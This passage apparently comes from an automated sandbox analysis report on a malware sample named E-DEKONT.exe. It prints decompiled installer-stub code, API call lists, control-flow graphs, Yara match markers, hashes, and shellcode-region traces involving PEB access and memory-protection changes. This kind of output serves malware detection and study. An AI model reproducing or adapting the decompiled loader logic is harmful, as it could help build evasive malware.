                                                                            							return _t38;
                                                                            						}
                                                                            						__eflags = _v12;
                                                                            						if(_v12 != 0) {
                                                                            							_t38 = E004065C5(_t68);
                                                                            							__eflags = _t38;
                                                                            							if(_t38 == 0) {
                                                                            								goto L36;
                                                                            							}
                                                                            							E00405B53(_t68);
                                                                            							_t38 = E00405948(__eflags, _t68, _v8 | 0x00000001);
                                                                            							__eflags = _t38;
                                                                            							if(_t38 != 0) {
                                                                            								return E004052E6(0xffffffe5, _t68);
                                                                            							}
                                                                            							__eflags = _v8;
                                                                            							if(_v8 == 0) {
                                                                            								goto L30;
                                                                            							}
                                                                            							E004052E6(0xfffffff1, _t68);
                                                                            							return E00406048(_t67, _t68, 0);
                                                                            						}
                                                                            						L30:
                                                                            						 *0x434f88 =  *0x434f88 + 1;
                                                                            						return _t38;
                                                                            					}
                                                                            					__eflags = _t65 & 0x00000002;
                                                                            					if((_t65 & 0x00000002) == 0) {
                                                                            						goto L28;
                                                                            					}
                                                                            					goto L5;
                                                                            				}
                                                                            			}



















                                                                            APIs
                                                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75F63420,00000000), ref: 004059B9
                                                                            • lstrcatW.KERNEL32(Carrels\Taktfastere.Obm,\*.*), ref: 00405A01
                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405A24
                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,Carrels\Taktfastere.Obm,?,?,C:\Users\user\AppData\Local\Temp\,75F63420,00000000), ref: 00405A2A
                                                                            • FindFirstFileW.KERNELBASE(Carrels\Taktfastere.Obm,?,?,?,0040A014,?,Carrels\Taktfastere.Obm,?,?,C:\Users\user\AppData\Local\Temp\,75F63420,00000000), ref: 00405A3A
                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ADA
                                                                            • FindClose.KERNEL32(00000000), ref: 00405AE9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: "C:\Users\user\Desktop\E-DEKONT.exe"$C:\Users\user\AppData\Local\Temp\$Carrels\Taktfastere.Obm$\*.*
                                                                            • API String ID: 2035342205-2662389400
                                                                            • Opcode ID: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                                            • Instruction ID: f2c7612d72ec45a398f238805cdec5f3e53338685f49ce317d80e039c8d46841
                                                                            • Opcode Fuzzy Hash: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                                            • Instruction Fuzzy Hash: 4E41C230A01A14AACB21AB658C89AAF7778DF81764F14427FF801711C1D77CA992DE6E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1015 2b66d12-2b66d21 1016 2b66d27-2b66dc1 GetPEB 1015->1016 1017 2b6352f-2b63542 call 2b63337 1015->1017 1021 2b66dc3-2b66e27 1016->1021 1022 2b63584-2b6359e 1017->1022 1023 2b63544-2b63583 1017->1023 1026 2b67411 1021->1026 1027 2b66e2d-2b66e6b 1021->1027 1023->1022 1030 2b66e6e-2b66f24 1027->1030 1030->1021 1033 2b66f2a-2b66f44 1030->1033 1034 2b8193e-2b81984 1033->1034 1035 2b66f4a-2b66f95 1033->1035 1034->1034 1037 2b81986-2b81a32 1034->1037 1035->1030 1038 2b66f9b-2b66ff7 1035->1038 1037->1017 1041 2b81a38-2b81a49 1037->1041 1042 2b67001-2b6700a 1038->1042 1043 2b81a4b-2b81a77 call 2b82873 call 2b81d70 1041->1043 1044 2b81a7c-2b81a8e 1041->1044 1042->1042 1045 2b6700c-2b6709f 1042->1045 1043->1044 1044->1034 1047 2b81a94-2b81aab 1044->1047 1045->1030 1052 2b670a5-2b672e3 call 2b8729e 1045->1052 1047->1017 1048 2b81ab1-2b81b78 call 2b8182b 1047->1048 1059 2b635b5-2b635b7 1048->1059 1060 2b81b7e-2b81c83 1048->1060 1068 2b672e5-2b672ec 1052->1068 1063 2b6d49e-2b6d4ae 1059->1063 1060->1059 1065 2b81c89-2b81cbc call 2b81cef 1060->1065 1066 2b6d4b0-2b6d4c7 1063->1066 1067 2b6d44e-2b6d47c 1063->1067 1073 2b81cc1-2b81ce5 call 2b81d70 1065->1073 1071 2b6d4c9-2b6d4cf 1066->1071 1067->1063 1068->1068 1072 2b672ee-2b67380 1068->1072 1071->1071 1074 2b6d4d1-2b6d53b 1071->1074 1079 2b67382-2b6738b 1072->1079 1077 2b6d53d-2b6d542 1074->1077 1078 2b6d543-2b6d57a 1077->1078 1081 2b6d57c-2b6d581 1078->1081 1082 2b6d5dd-2b6d5e8 1078->1082 1079->1079 1083 2b6738d-2b67407 1079->1083 1081->1077 1086 2b6d583-2b6d5c0 1081->1086 1089 2b6d623-2b6d625 1082->1089 1090 2b6d5eb-2b6d5fc 1082->1090 1083->1030 1086->1078 1094 2b6d5c2-2b83a4d 1086->1094 1092 2b6d626-2b6d71b 1089->1092 1090->1092 1093 2b6d5fe 1090->1093 1094->1063 1099 2b83a53-2b83a5d 1094->1099 1099->1059 1100 2b83a63 1099->1100 1101 2b83a64-2b83ab4 1100->1101 1101->1101 1102 2b83ab6-2b83ac5 1101->1102 1102->1063 1103 2b83acb-2b83ad7 
1102->1103 1103->1059 1104 2b83add-2b83bba 1103->1104 1104->1063 1107 2b83bc0-2b83bca 1104->1107 1107->1059 1108 2b83bd0-2b83c0e 1107->1108
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 2#q$AWH$AWH$Q=v/$Q=v/$]kcg$v}Hj
                                                                            • API String ID: 0-1510597524
                                                                            • Opcode ID: d61d3c6bb26cb8d07a5645f2205e9b2f74ab842e2910e34909a1bcbf6b4c7715
                                                                            • Instruction ID: 64d2839b87ffdb8381d972280dd9a1323c07fa5139fd280b23dcbdb245b9ce18
                                                                            • Opcode Fuzzy Hash: d61d3c6bb26cb8d07a5645f2205e9b2f74ab842e2910e34909a1bcbf6b4c7715
                                                                            • Instruction Fuzzy Hash: DE027B796043469FDF309E28CD947DA37B3EF927E0F55416ACC889B244D7398986CB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1122 2b804ed-2b805c0 1124 2b8193e-2b81984 1122->1124 1125 2b805c6-2b805ea 1122->1125 1124->1124 1126 2b81986-2b81a32 1124->1126 1127 2b635b5-2b635b7 1125->1127 1128 2b805f0-2b80745 call 2b80640 1125->1128 1132 2b81a38-2b81a49 1126->1132 1133 2b6352f-2b63542 call 2b63337 1126->1133 1131 2b6d49e-2b6d4ae 1127->1131 1128->1124 1152 2b8074b-2b80762 1128->1152 1135 2b6d4b0-2b6d4c7 1131->1135 1136 2b6d44e-2b6d47c 1131->1136 1139 2b81a4b-2b81a77 call 2b82873 call 2b81d70 1132->1139 1140 2b81a7c-2b81a8e 1132->1140 1149 2b63584-2b6359e 1133->1149 1150 2b63544-2b63583 1133->1150 1142 2b6d4c9-2b6d4cf 1135->1142 1136->1131 1139->1140 1140->1124 1147 2b81a94-2b81aab 1140->1147 1142->1142 1146 2b6d4d1-2b6d53b 1142->1146 1153 2b6d53d-2b6d542 1146->1153 1147->1133 1148 2b81ab1-2b81b78 call 2b8182b 1147->1148 1148->1127 1168 2b81b7e-2b81c83 1148->1168 1150->1149 1152->1127 1158 2b80768-2b80785 CreateFileA 1152->1158 1154 2b6d543-2b6d57a 1153->1154 1159 2b6d57c-2b6d581 1154->1159 1160 2b6d5dd-2b6d5e8 1154->1160 1158->1124 1159->1153 1166 2b6d583-2b6d5c0 1159->1166 1170 2b6d623-2b6d625 1160->1170 1171 2b6d5eb-2b6d5fc 1160->1171 1166->1154 1177 2b6d5c2-2b83a4d 1166->1177 1168->1127 1176 2b81c89-2b81cbc call 2b81cef 1168->1176 1174 2b6d626-2b6d71b 1170->1174 1171->1174 1175 2b6d5fe 1171->1175 1180 2b81cc1-2b81ce5 call 2b81d70 1176->1180 1177->1131 1186 2b83a53-2b83a5d 1177->1186 1186->1127 1187 2b83a63 1186->1187 1188 2b83a64-2b83ab4 1187->1188 1188->1188 1189 2b83ab6-2b83ac5 1188->1189 1189->1131 1190 2b83acb-2b83ad7 1189->1190 1190->1127 1191 2b83add-2b83bba 1190->1191 1191->1131 1194 2b83bc0-2b83bca 1191->1194 1194->1127 1195 2b83bd0-2b83c0e 1194->1195
                                                                            APIs
                                                                            • CreateFileA.KERNELBASE(?,B823BD60,7D5E7261), ref: 02B8077C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: AWH$AWH$]kcg
                                                                            • API String ID: 823142352-257656276
                                                                            • Opcode ID: bea1649408ecf56eb5ddf9525c42e930f1e0d57a2f46fd04eddeffed4b227d29
                                                                            • Instruction ID: a3351798048427beb8364786c393431698d1b6666424adf92df9432f79ebe367
                                                                            • Opcode Fuzzy Hash: bea1649408ecf56eb5ddf9525c42e930f1e0d57a2f46fd04eddeffed4b227d29
                                                                            • Instruction Fuzzy Hash: F6913976A053499FDF30AE288DA47DB37A7AF967A0F96402EDC4D97204D73489878B01
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AWH$AWH$]kcg$e\?
                                                                            • API String ID: 0-2718312424
                                                                            • Opcode ID: 2c9931f20428980818efc0bc56686bb0f412c20e25f104e8e165772354f9995e
                                                                            • Instruction ID: 9584756c06bda2d3a3584ddc03dd701dc1467d9c5dbce2fbabea4f39be38068f
                                                                            • Opcode Fuzzy Hash: 2c9931f20428980818efc0bc56686bb0f412c20e25f104e8e165772354f9995e
                                                                            • Instruction Fuzzy Hash: 8EC1AD7AB003459FDF30AD6889D47DA37A39F96760FE6406ACC8D9B205D7358987CB02
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004065C5(WCHAR* _a4) {
                                                                            				void* _t2;
                                                                            
                                                                            				_t2 = FindFirstFileW(_a4, 0x430298); // executed
                                                                            				if(_t2 == 0xffffffff) {
                                                                            					return 0;
                                                                            				}
                                                                            				FindClose(_t2);
                                                                            				return 0x430298;
                                                                            			}





                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CA4,C:\,C:\,00000000,C:\,C:\,?,?,75F63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75F63420), ref: 004065D0
                                                                            • FindClose.KERNEL32(00000000), ref: 004065DC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID: C:\
                                                                            • API String ID: 2295610775-3404278061
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AWH$AWH$]kcg
                                                                            • API String ID: 0-257656276
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%


                                                                            APIs
                                                                            • K32EnumDeviceDrivers.KERNEL32(00000001,02B86F54), ref: 02B8652B
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeviceDriversEnum
                                                                            • String ID:
                                                                            • API String ID: 22031212-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtProtectVirtualMemory.NTDLL ref: 02B84FF5
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MemoryProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 2706961497-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph (function 403d3e; nodes marked Executed / Not Executed; graph image not preserved)
                                                                            C-Code - Quality: 83%
                                                                            			E00403D3E(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                            				struct HWND__* _v32;
                                                                            				void* _v84;
                                                                            				void* _v88;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				signed int _t37;
                                                                            				signed int _t39;
                                                                            				signed int _t41;
                                                                            				struct HWND__* _t51;
                                                                            				signed int _t70;
                                                                            				struct HWND__* _t76;
                                                                            				signed int _t89;
                                                                            				struct HWND__* _t94;
                                                                            				signed int _t102;
                                                                            				int _t106;
                                                                            				signed int _t118;
                                                                            				signed int _t119;
                                                                            				int _t120;
                                                                            				signed int _t125;
                                                                            				struct HWND__* _t128;
                                                                            				struct HWND__* _t129;
                                                                            				int _t130;
                                                                            				long _t133;
                                                                            				int _t135;
                                                                            				int _t136;
                                                                            				void* _t137;
                                                                            				void* _t144;
                                                                            
                                                                            				_t118 = _a8;
                                                                            				if(_t118 == 0x110 || _t118 == 0x408) {
                                                                            					_t37 = _a12;
                                                                            					_t128 = _a4;
                                                                            					__eflags = _t118 - 0x110;
                                                                            					 *0x42d230 = _t37;
                                                                            					if(_t118 == 0x110) {
                                                                            						 *0x434ee8 = _t128;
                                                                            						 *0x42d244 = GetDlgItem(_t128, 1);
                                                                            						_t94 = GetDlgItem(_t128, 2);
                                                                            						_push(0xffffffff);
                                                                            						_push(0x1c);
                                                                            						 *0x42b210 = _t94;
                                                                            						E00404217(_t128);
                                                                            						SetClassLongW(_t128, 0xfffffff2,  *0x433ec8);
                                                                            						 *0x433eac = E0040140B(4);
                                                                            						_t37 = 1;
                                                                            						__eflags = 1;
                                                                            						 *0x42d230 = 1;
                                                                            					}
                                                                            					_t125 =  *0x40a368; // 0x0
                                                                            					_t136 = 0;
                                                                            					_t133 = (_t125 << 6) +  *0x434f20;
                                                                            					__eflags = _t125;
                                                                            					if(_t125 < 0) {
                                                                            						L34:
                                                                            						E00404263(0x40b);
                                                                            						while(1) {
                                                                            							_t39 =  *0x42d230;
                                                                            							 *0x40a368 =  *0x40a368 + _t39;
                                                                            							_t133 = _t133 + (_t39 << 6);
                                                                            							_t41 =  *0x40a368; // 0x0
                                                                            							__eflags = _t41 -  *0x434f24;
                                                                            							if(_t41 ==  *0x434f24) {
                                                                            								E0040140B(1);
                                                                            							}
                                                                            							__eflags =  *0x433eac - _t136;
                                                                            							if( *0x433eac != _t136) {
                                                                            								break;
                                                                            							}
                                                                            							__eflags =  *0x40a368 -  *0x434f24; // 0x0
                                                                            							if(__eflags >= 0) {
                                                                            								break;
                                                                            							}
                                                                            							_t119 =  *(_t133 + 0x14);
                                                                            							E004062A4(_t119, _t128, _t133, 0x444000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                            							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                            							_push(0xfffffc19);
                                                                            							E00404217(_t128);
                                                                            							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                            							_push(0xfffffc1b);
                                                                            							E00404217(_t128);
                                                                            							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                            							_push(0xfffffc1a);
                                                                            							E00404217(_t128);
                                                                            							_t51 = GetDlgItem(_t128, 3);
                                                                            							__eflags =  *0x434f8c - _t136;
                                                                            							_v32 = _t51;
                                                                            							if( *0x434f8c != _t136) {
                                                                            								_t119 = _t119 & 0x0000fefd | 0x00000004;
                                                                            								__eflags = _t119;
                                                                            							}
                                                                            							ShowWindow(_t51, _t119 & 0x00000008); // executed
                                                                            							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
                                                                            							E00404239(_t119 & 0x00000002);
                                                                            							_t120 = _t119 & 0x00000004;
                                                                            							EnableWindow( *0x42b210, _t120);
                                                                            							__eflags = _t120 - _t136;
                                                                            							if(_t120 == _t136) {
                                                                            								_push(1);
                                                                            							} else {
                                                                            								_push(_t136);
                                                                            							}
                                                                            							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
                                                                            							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
                                                                            							__eflags =  *0x434f8c - _t136;
                                                                            							if( *0x434f8c == _t136) {
                                                                            								_push( *0x42d244);
                                                                            							} else {
                                                                            								SendMessageW(_t128, 0x401, 2, _t136);
                                                                            								_push( *0x42b210);
                                                                            							}
                                                                            							E0040424C();
                                                                            							E00406282(0x42d248, E00403D1F());
                                                                            							E004062A4(0x42d248, _t128, _t133,  &(0x42d248[lstrlenW(0x42d248)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                            							SetWindowTextW(_t128, 0x42d248); // executed
                                                                            							_push(_t136);
                                                                            							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                                            							__eflags = _t70;
                                                                            							if(_t70 != 0) {
                                                                            								continue;
                                                                            							} else {
                                                                            								__eflags =  *_t133 - _t136;
                                                                            								if( *_t133 == _t136) {
                                                                            									continue;
                                                                            								}
                                                                            								__eflags =  *(_t133 + 4) - 5;
                                                                            								if( *(_t133 + 4) != 5) {
                                                                            									DestroyWindow( *0x433eb8); // executed
                                                                            									 *0x42c220 = _t133;
                                                                            									__eflags =  *_t133 - _t136;
                                                                            									if( *_t133 <= _t136) {
                                                                            										goto L58;
                                                                            									}
                                                                            									_t76 = CreateDialogParamW( *0x434ee0,  *_t133 +  *0x433ec0 & 0x0000ffff, _t128,  *(0x40a36c +  *(_t133 + 4) * 4), _t133); // executed
                                                                            									__eflags = _t76 - _t136;
                                                                            									 *0x433eb8 = _t76;
                                                                            									if(_t76 == _t136) {
                                                                            										goto L58;
                                                                            									}
                                                                            									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                            									_push(6);
                                                                            									E00404217(_t76);
                                                                            									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
                                                                            									ScreenToClient(_t128, _t137 + 0x10);
                                                                            									SetWindowPos( *0x433eb8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                            									_push(_t136);
                                                                            									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                                            									__eflags =  *0x433eac - _t136;
                                                                            									if( *0x433eac != _t136) {
                                                                            										goto L61;
                                                                            									}
                                                                            									ShowWindow( *0x433eb8, 8);
                                                                            									E00404263(0x405);
                                                                            									goto L58;
                                                                            								}
                                                                            								__eflags =  *0x434f8c - _t136;
                                                                            								if( *0x434f8c != _t136) {
                                                                            									goto L61;
                                                                            								}
                                                                            								__eflags =  *0x434f80 - _t136;
                                                                            								if( *0x434f80 != _t136) {
                                                                            									continue;
                                                                            								}
                                                                            								goto L61;
                                                                            							}
                                                                            						}
                                                                            						DestroyWindow( *0x433eb8);
                                                                            						 *0x434ee8 = _t136;
                                                                            						EndDialog(_t128,  *0x42ba18);
                                                                            						goto L58;
                                                                            					} else {
                                                                            						__eflags = _t37 - 1;
                                                                            						if(_t37 != 1) {
                                                                            							L33:
                                                                            							__eflags =  *_t133 - _t136;
                                                                            							if( *_t133 == _t136) {
                                                                            								goto L61;
                                                                            							}
                                                                            							goto L34;
                                                                            						}
                                                                            						_push(0);
                                                                            						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                                            						__eflags = _t89;
                                                                            						if(_t89 == 0) {
                                                                            							goto L33;
                                                                            						}
                                                                            						SendMessageW( *0x433eb8, 0x40f, 0, 1);
                                                                            						__eflags =  *0x433eac;
                                                                            						return 0 |  *0x433eac == 0x00000000;
                                                                            					}
                                                                            				} else {
                                                                            					_t128 = _a4;
                                                                            					_t136 = 0;
                                                                            					if(_t118 == 0x47) {
                                                                            						SetWindowPos( *0x42d228, _t128, 0, 0, 0, 0, 0x13);
                                                                            					}
                                                                            					if(_t118 == 5) {
                                                                            						asm("sbb eax, eax");
                                                                            						ShowWindow( *0x42d228,  ~(_a12 - 1) & _t118);
                                                                            					}
                                                                            					if(_t118 != 0x40d) {
                                                                            						__eflags = _t118 - 0x11;
                                                                            						if(_t118 != 0x11) {
                                                                            							__eflags = _t118 - 0x111;
                                                                            							if(_t118 != 0x111) {
                                                                            								L26:
                                                                            								return E0040427E(_t118, _a12, _a16);
                                                                            							}
                                                                            							_t135 = _a12 & 0x0000ffff;
                                                                            							_t129 = GetDlgItem(_t128, _t135);
                                                                            							__eflags = _t129 - _t136;
                                                                            							if(_t129 == _t136) {
                                                                            								L13:
                                                                            								__eflags = _t135 - 1;
                                                                            								if(_t135 != 1) {
                                                                            									__eflags = _t135 - 3;
                                                                            									if(_t135 != 3) {
                                                                            										_t130 = 2;
                                                                            										__eflags = _t135 - _t130;
                                                                            										if(_t135 != _t130) {
                                                                            											L25:
                                                                            											SendMessageW( *0x433eb8, 0x111, _a12, _a16);
                                                                            											goto L26;
                                                                            										}
                                                                            										__eflags =  *0x434f8c - _t136;
                                                                            										if( *0x434f8c == _t136) {
                                                                            											_t102 = E0040140B(3);
                                                                            											__eflags = _t102;
                                                                            											if(_t102 != 0) {
                                                                            												goto L26;
                                                                            											}
                                                                            											 *0x42ba18 = 1;
                                                                            											L21:
                                                                            											_push(0x78);
                                                                            											L22:
                                                                            											E004041F0();
                                                                            											goto L26;
                                                                            										}
                                                                            										E0040140B(_t130);
                                                                            										 *0x42ba18 = _t130;
                                                                            										goto L21;
                                                                            									}
                                                                            									__eflags =  *0x40a368 - _t136; // 0x0
                                                                            									if(__eflags <= 0) {
                                                                            										goto L25;
                                                                            									}
                                                                            									_push(0xffffffff);
                                                                            									goto L22;
                                                                            								}
                                                                            								_push(_t135);
                                                                            								goto L22;
                                                                            							}
                                                                            							SendMessageW(_t129, 0xf3, _t136, _t136);
                                                                            							_t106 = IsWindowEnabled(_t129);
                                                                            							__eflags = _t106;
                                                                            							if(_t106 == 0) {
                                                                            								goto L61;
                                                                            							}
                                                                            							goto L13;
                                                                            						}
                                                                            						SetWindowLongW(_t128, _t136, _t136);
                                                                            						return 1;
                                                                            					} else {
                                                                            						DestroyWindow( *0x433eb8);
                                                                            						 *0x433eb8 = _a12;
                                                                            						L58:
                                                                            						_t144 =  *0x42f248 - _t136; // 0x0
                                                                            						if(_t144 == 0 &&  *0x433eb8 != _t136) {
                                                                            							ShowWindow(_t128, 0xa);
                                                                            							 *0x42f248 = 1;
                                                                            						}
                                                                            						L61:
                                                                            						return 0;
                                                                            					}
                                                                            				}
                                                                            			}

                                                                            0x00403ddb
                                                                            0x00403e7e
                                                                            0x00000000
                                                                            0x00403e87
                                                                            0x00403de1
                                                                            0x00403dee
                                                                            0x00403df0
                                                                            0x00403df2
                                                                            0x00403e11
                                                                            0x00403e11
                                                                            0x00403e14
                                                                            0x00403e19
                                                                            0x00403e1c
                                                                            0x00403e2c
                                                                            0x00403e2d
                                                                            0x00403e2f
                                                                            0x00403e65
                                                                            0x00403e78
                                                                            0x00000000
                                                                            0x00403e78
                                                                            0x00403e31
                                                                            0x00403e37
                                                                            0x00403e50
                                                                            0x00403e55
                                                                            0x00403e57
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403e59
                                                                            0x00403e45
                                                                            0x00403e45
                                                                            0x00403e47
                                                                            0x00403e47
                                                                            0x00000000
                                                                            0x00403e47
                                                                            0x00403e3a
                                                                            0x00403e3f
                                                                            0x00000000
                                                                            0x00403e3f
                                                                            0x00403e1e
                                                                            0x00403e24
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403e26
                                                                            0x00000000
                                                                            0x00403e26
                                                                            0x00403e16
                                                                            0x00000000
                                                                            0x00403e16
                                                                            0x00403dfc
                                                                            0x00403e03
                                                                            0x00403e09
                                                                            0x00403e0b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403e0b
                                                                            0x00403dc7
                                                                            0x00000000
                                                                            0x00403da5
                                                                            0x00403dab
                                                                            0x00403db5
                                                                            0x004041c1
                                                                            0x004041c1
                                                                            0x004041c7
                                                                            0x004041d4
                                                                            0x004041da
                                                                            0x004041da
                                                                            0x004041e4
                                                                            0x00000000
                                                                            0x004041e4
                                                                            0x00403da3

                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D7A
                                                                            • ShowWindow.USER32(?), ref: 00403D97
                                                                            • DestroyWindow.USER32 ref: 00403DAB
                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DC7
                                                                            • GetDlgItem.USER32(?,?), ref: 00403DE8
                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DFC
                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403E03
                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403EB1
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403EBB
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403ED5
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F26
                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403FCC
                                                                            • ShowWindow.USER32(00000000,?), ref: 00403FED
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FFF
                                                                            • EnableWindow.USER32(?,?), ref: 0040401A
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404030
                                                                            • EnableMenuItem.USER32(00000000), ref: 00404037
                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040404F
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404062
                                                                            • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 0040408C
                                                                            • SetWindowTextW.USER32(?,0042D248), ref: 004040A0
                                                                            • ShowWindow.USER32(?,0000000A), ref: 004041D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
